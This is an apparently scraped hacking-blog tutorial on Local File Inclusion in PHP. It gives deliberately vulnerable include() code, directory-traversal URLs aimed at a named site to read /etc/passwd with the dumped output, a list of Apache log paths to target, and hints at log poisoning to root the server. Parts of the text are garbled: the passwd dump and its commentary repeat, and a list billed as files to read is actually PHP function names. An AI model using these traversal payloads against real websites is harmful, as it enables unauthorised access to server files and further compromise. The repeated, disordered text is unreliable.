www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
landscape:x:103:108::/var/lib/landscape:/bin/false
messagebus:x:104:112::/var/run/dbus:/bin/false
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
mysql:x:105:113::/var/lib/mysql:/bin/false
avahi:x:106:114::/var/run/avahi-daemon:/bin/false
snort:x:107:115:Snort IDS:/var/log/snort:/bin/false
statd:x:108:65534::/var/lib/nfs:/bin/false
haldaemon:x:109:117::/var/run/hald:/bin/false
kdm:x:110:65534::/home/kdm:/bin/false
That's mean it worked. But modern unix like system now does not include the hash in the /etc/passwd (All hash on /etc/shadow)... So there is no permission then you can't read /etc/shadow file.
There are many file you may interest to read :
include
include_once
require
require_once
fopen
For example, suppose in a pages :
<?
$vulnerable = $_GET[vulnerable]; include($vulnerable); #this maybe require,require_once, fopen etc ?>
This is code is vulnerable to Local file inclusion vulnerable.
Suppose , Our target url is www.n00bprogammer.com/vulnerable/
If you directly submit this url on browser address bar then you get web page , That's mean there is a file "index.php"
If we try like :
www.n00bprogammer.com/vulnerable/index.php?vulnerable=../../etc/passwd (did not work)
www.n00bprogammer.com/vulnerable/index.php?vulnerable=../../../../etc/passwd
And it output :
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
landscape:x:103:108::/var/lib/landscape:/bin/false
messagebus:x:104:112::/var/run/dbus:/bin/false
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
mysql:x:105:113::/var/lib/mysql:/bin/false
avahi:x:106:114::/var/run/avahi-daemon:/bin/false
snort:x:107:115:Snort IDS:/var/log/snort:/bin/false
statd:x:108:65534::/var/lib/nfs:/bin/false
haldaemon:x:109:117::/var/run/hald:/bin/false
kdm:x:110:65534::/home/kdm:/bin/false
That's mean it worked. But modern unix like system now does not include the hash in the /etc/passwd (All hash on /etc/shadow)... So there is no permission then you can't read /etc/shadow file.
There are many file you may interest to read :
/etc/httpd/logs/acces_log
/etc/httpd/logs/error_log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_ log
/usr/local/apache/logs/access. log
/var/log/apache/access_log
/var/log/apache2/access_log
/var/log/apache/access.log
/var/log/apache2/access.log
/var/log/access_log
There are many sites which have unnecessary url variable with file extension... They use the value
php,images,asp file. This is not secure at all. For example :
www.target.site/vulnerable.php?=image.jpeg
This maybe also vulnerable to LFI... Try.
Advance hackers can go more deeply. Such as:
1. There are some special way attacking application tier for rooting the system(Hint: overwriting error_log).
2. Reading more advance file (Hint: SQL).
Try them , Research and learn...
Read more: http://en.wikipedia.org/wiki/Remote_file_inclusion
Let me know if you have any question please...
Langganan:
Postingan (Atom)